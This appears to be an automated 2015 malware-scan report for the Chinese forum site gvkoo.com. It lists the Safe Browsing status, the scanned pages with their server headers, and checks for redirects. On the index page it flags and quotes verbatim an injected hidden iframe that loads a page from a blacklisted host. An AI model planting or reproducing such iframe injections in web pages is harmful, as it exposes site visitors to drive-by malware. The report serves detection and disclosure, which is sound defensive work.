Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gvkoo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gvkoo.com/ | HTTP/1.1 200 OK Date: Sat, 07 Mar 2015 07:55:17 GMT Accept-Ranges: bytes ETag: "50ae6883fe54d01:1999" Server: Microsoft-IIS/6.0 Content-Length: 96292 Content-Location: http://www.gvkoo.com/index.html Content-Type: text/html Last-Modified: Mon, 02 Mar 2015 15:35:29 GMT X-Powered-By: ASP.NET | clean |
http://www.gvkoo.com/index.html | 200 OK Content-Length: 96292 Content-Type: text/html | malicious |
Page code contains blacklisted domain: key.ddoshome.com <iframe src=http://key.ddoshome.com:21999/index.htm width=123 height=1></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>¹È¿ÍÉú»îÍø,¹È¿Í,¹È¿ÍÉú»î,¹È¿ÍÕ÷»é,¹È¿Í½»ÓÑ,¹È¿Í·ÖÀàÐÅÏ¢,¹È¿ÍÉçÇø,¹È¿ÍÂÛ̳,¹È¿Í¹ÙÍø,¹È¿ÍÉú» ...[4250 bytes skipped]... Malicious iFrame found. size: 123x1 src: http://key.ddoshome.com:21999/index.htm This URL is marked by Google as suspicious <iframe src=http://key.ddoshome.com:21999/index.htm width=123 height=1> | ||
http://www.gvkoo.com/data/cache/common.js?WP9 | 200 OK Content-Length: 56144 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/data/cache/portal.js?WP9 | 200 OK Content-Length: 9945 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/data/cache/logging.js?WP9 | 200 OK Content-Length: 390 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/home.php?mod=misc&ac=sendmail&rand=1425277060 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.gvkoo.com/data/cache/html2dynamic.js?WP9 | 200 OK Content-Length: 2215 Content-Type: application/x-javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/member.php?mod=register | 200 OK Content-Length: 5792 Content-Type: text/html | clean |
http://www.gvkoo.com/data/cache/common.js?S0u | 200 OK Content-Length: 56144 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/data/cache/logging.js?S0u | 200 OK Content-Length: 390 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/./ | HTTP/1.1 200 OK Date: Sat, 07 Mar 2015 07:55:44 GMT Accept-Ranges: bytes ETag: "50ae6883fe54d01:1999" Server: Microsoft-IIS/6.0 Content-Length: 96292 Content-Location: http://www.gvkoo.com/index.html Content-Type: text/html Last-Modified: Mon, 02 Mar 2015 15:35:29 GMT X-Powered-By: ASP.NET | clean |
http://www.gvkoo.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.gvkoo.com/connect.php?mod=login&op=init&referer=http%3A%2F%2Fwww.gvkoo.com%2F.%2F&statfrom=login_simple | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 07 Mar 2015 07:55:47 GMT Location: https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310676843&redirect_uri=http%3A%2F%2Fwww.gvkoo.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.gvkoo.com%252F.%252F&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2Cadd_share%2Cadd_t%2Cadd_pic_t%2Cget_repost_list Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=gbk Set-Cookie: NYrF_2132_saltkey=Cp4UPs6T; expires=Mon, 06-Apr-2015 07:55:47 GMT; path=/; httponly Set-Cookie: NYrF_2132_lastvisit=1425711347; expires=Mon, 06-Apr-2015 07:55:47 GMT; path=/ Set-Cookie: NYrF_2132_sid=w3CBlt; expires=Sun, 08-Mar-2015 07:55:47 GMT; path=/ Set-Cookie: NYrF_2132_lastact=1425714947%09connect.php%09login; expires=Sun, 08-Mar-2015 07:55:47 GMT; path=/ Set-Cookie: NYrF_2132_con_request_uri=http%3A%2F%2Fwww.gvkoo.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.gvkoo.com%252F.%252F; path=/ X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310676843&redirect_uri=http%3a%2f%2fwww.gvkoo.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.gvkoo.com%252f.%252f&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 07 Mar 2015 07:55:55 GMT Location: http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=310676843&redirect_uri=http%3a%2f%2fwww.gvkoo.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.gvkoo.com%252f.%252f&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list Server: tws Content-Length: 0 Content-Type: text/html | clean |
http://openapi.qzone.qq.com/oauth/show?which=login&display=pc&response_type=code&client_id=310676843&redirect_uri=http%3a%2f%2fwww.gvkoo.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.gvkoo.com%252f.%252f&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | 200 OK Content-Length: 7473 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.gvkoo.com ...[1851 bytes skipped]... r.userAgent].join("|_|")); var src = 'http://badjs.qq.com/cgi-bin/js_report?'+ [bid,mid,msg].join("&"); errorTransport = new Image; errorTransport.onerror = errorTransport.onload = function(){ errorTransport = errorTransport.onerror = errorTransport.onload = null ; }; errorTransport.src = src; false; Q.crtDomain = 'http://www.gvkoo.com/'; Q.agree = function(){ window.isAgreed = true; }; Q.logout = function(){ window.isLogouted = true; }; Q.isNeedLogin = true; Q.getParameter = function getParameter(name) { var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"), m = location.href.match(r); return decodeURIComponent(!m ? "" : m[2]); }; Q.ptlogin2 = function(){ ...[1780 bytes skipped]... | ||
http://qzonestyle.gtimg.cn/c/=/open/connect/widget/pc/login/pt_adapt.js,qlogin_v2.js?v=20140527 | 200 OK Content-Length: 24403 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/forum.php?gid=1 | 200 OK Content-Length: 51722 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fenlei.gvkoo.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>¹È¿Í³ÇÊÐÉú»îÂÛ̳,¹È¿ÍÉú»îÍø</title> <meta name="keywords" content="³ÇÊÐÉú»îÂÛ̳,¹È¿ÍÉú»îÍø" /> <meta name="description" content= ...[4312 bytes skipped]... | ||
http://www.gvkoo.com/data/cache/forum.js?S0u | 200 OK Content-Length: 19423 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gvkoo.com
Result:
GET / HTTP/1.1
Host: gvkoo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gvkoo.com
Referer: http://www.google.com/search?q=gvkoo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gvkoo.com
Referer: http://www.google.com/search?q=gvkoo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.